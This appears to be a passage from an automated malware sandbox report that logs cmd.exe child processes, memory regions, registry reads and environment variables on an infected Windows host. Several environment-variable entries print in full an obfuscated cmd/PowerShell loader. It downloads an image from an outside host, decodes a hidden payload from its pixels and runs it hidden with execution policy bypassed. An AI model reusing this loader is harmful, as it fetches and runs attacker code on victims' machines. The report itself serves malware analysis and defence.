Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141321 True 1
Fn
Environment (10)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = *[-,, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIzy=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #12: cmd.exe
625 0
Information Value
ID #12
File Name c:\windows\system32\cmd.exe
Command Line cmd ;
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:43, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
Information Value
PID 0xb44
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB48
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory rw True False False -
private_0x0000000000330000 0x00330000 0x0042ffff Private Memory rw True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory rw True False False -
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006f0000 0x006f0000 0x00870fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000880000 0x00880000 0x01c7ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c80000 0x01c80000 0x01fc2fff Pagefile Backed Memory r True False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory rw True False False -
basebrd.dll 0x020d0000 0x02197fff Memory Mapped File r False False False -
pagefile_0x00000000021a0000 0x021a0000 0x02592fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x025a0000 0x0286efff Memory Mapped File r False False False -
private_0x0000000002870000 0x02870000 0x02a6ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd6fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (569)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 9
Fn
Get Info STD_INPUT_HANDLE type = file_type True 4
Fn
Get Info cmd.exE type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 37
Fn
Open STD_INPUT_HANDLE - True 257
Fn
Read STD_INPUT_HANDLE size = 1, size_out = 1 True 249
Fn
Data
Read STD_INPUT_HANDLE size = 1, size_out = 0 False 1
Fn
Write STD_OUTPUT_HANDLE size = 36 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 2 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 63 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 1095 True 1
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Get Info C:\Windows\system32\cmd.exe type = PROCESS_BASIC_INFORMATION True 1
Fn
Memory (1)
Operation Process Additional Information Success Count Logfile
Read C:\Windows\system32\cmd.exe address = 0x7fffffdf000, size = 896 True 1
Fn
Data
Module (10)
Operation Module Additional Information Success Count Logfile
Load NTDLL.DLL base_address = 0x77c40000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = NtQueryInformationProcess, address_out = 0x77c914a0 True 1
Fn
System (3)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141352 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (21)
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 3
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = {foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math] False 1
Fn
Get Environment String name = adizY False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #13: cmd.exe
62 0
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line cmd.exE /c %adizY%
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0xb4c
Parent PID 0xb44 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB50
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x001effff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000260000 0x00260000 0x0035ffff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory rw True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory rw True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01f62fff Pagefile Backed Memory r True False False -
private_0x0000000001f70000 0x01f70000 0x0206ffff Private Memory rw True False False -
sortdefault.nls 0x02070000 0x0233efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open - - True 1
Fn
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xb54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xb5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141633 True 1
Fn
Environment (20)
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = adizY, result_out = EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) |POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Process #14: cmd.exe
50 0
Information Value
ID #14
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:01:45, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0xb54
Parent PID 0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB58
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00045fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
locale.nls 0x00170000 0x001d6fff Memory Mapped File r False False False -
private_0x00000000001e0000 0x001e0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory rw True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory rw True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory rw True False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory rw True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d10000 0x01d10000 0x02052fff Pagefile Backed Memory r True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (12)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 79 True 1
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
